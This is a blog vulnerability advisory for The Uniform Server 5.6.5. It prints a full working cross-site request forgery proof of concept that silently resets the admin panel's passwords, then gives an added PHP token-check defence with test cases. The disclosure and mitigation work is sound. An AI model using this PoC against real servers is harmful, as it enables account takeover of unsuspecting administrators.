This site is soon to be deprecated by http://www.johnleitch.net

Saturday, May 15, 2010

The Uniform Server 5.6.5 XSRF

A cross-site request forgery vulnerability in The Uniform Server 5.6.5 web UI can be exploited to change various administrative passwords.

PoC:
<html>
<head>
<script type="text/javascript">
window.onload = function() {
    var url = 'http://localhost/apanel';

    var xsrs = [
        {
            "action": url + "/apsetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "apuser", "value": "new_username" },
                { "name": "appass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        },
        {
            "action": url + "/psetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "puser", "value": "new_username" },
                { "name": "ppass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        },
        {
            "action": url + "/sslpsetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "puser", "value": "new_username" },
                { "name": "ppass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        },
        {
            "action": url + "/mqsetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "qpass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        }
    ];

    for (var x = 0; x < xsrs.length; x++) {
        var attackFrame = document.createElement('iframe');

        var html = '<html><body><form action="' + xsrs[x].action + '" ' +
            'method="' + xsrs[x].method + '">';

        for (var y = 0; y < xsrs[x].fields.length; y++) {
            html += '<input type="' +
                (xsrs[x].fields[y].type != null ?
                    xsrs[x].fields[y].type : 'hidden') + '" ' +
                'name="' + xsrs[x].fields[y].name + '" ' +
                'value="' + xsrs[x].fields[y].value + '" />';
        }

        html += '</form><script>' + xsrs[x].submitCall + '\x3c/script></body></html>';

        document.body.appendChild(attackFrame);

        attackFrame.contentDocument.write(html);
    }
}
</script>
</head>
<body>
</body>
</html>
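
A server-side check that would reject the forged POSTs above, as an added example (not code from the original post or from The Uniform Server). It assumes PHP 7.1+, a panel served from `http://localhost`, and a hidden form field named `csrf_token`; the function names, the constant and the sample requests are hypothetical.

```php
<?php
// Added example, not The Uniform Server's code. Assumes PHP 7.1+.
// PANEL_ORIGIN and the csrf_token field name are hypothetical.
const PANEL_ORIGIN = 'http://localhost';

// Return the per-session token, creating it on first use. The panel would
// emit it as a hidden <input name="csrf_token"> in each password form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Accept a state-changing request only if it is a POST, any Origin header
// names the panel itself, and the body carries this session's token.
function csrf_check(array $session, array $server, array $post): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    if (isset($server['HTTP_ORIGIN']) && $server['HTTP_ORIGIN'] !== PANEL_ORIGIN) {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    $want = $session['csrf'] ?? '';
    // hash_equals compares in constant time; reject arrays and empty tokens.
    return is_string($sent) && $want !== '' && hash_equals($want, $sent);
}

// In a handler such as apsetup.php this would run before any change:
//   session_start();
//   if (!csrf_check($_SESSION, $_SERVER, $_POST)) { http_response_code(403); exit; }

// Constructed requests (not captured traffic) to exercise the check.
$session = [];
$token   = csrf_token($session);
$fields  = ['apuser' => 'new_username', 'appass' => 'new_password', 'submit' => 'Change'];
$cases   = [
    'cross-site form, no token'  => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://other.example'], $fields],
    'same origin, token missing' => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => PANEL_ORIGIN], $fields],
    'panel form with token'      => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => PANEL_ORIGIN], $fields + ['csrf_token' => $token]],
];
foreach ($cases as $label => [$server, $post]) {
    printf("%-27s %s\n", $label, csrf_check($session, $server, $post) ? 'accepted' : 'rejected');
}
```

The token is what stops the forgery: a page on another origin can submit the form fields but cannot read the session-bound value it would need to include.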
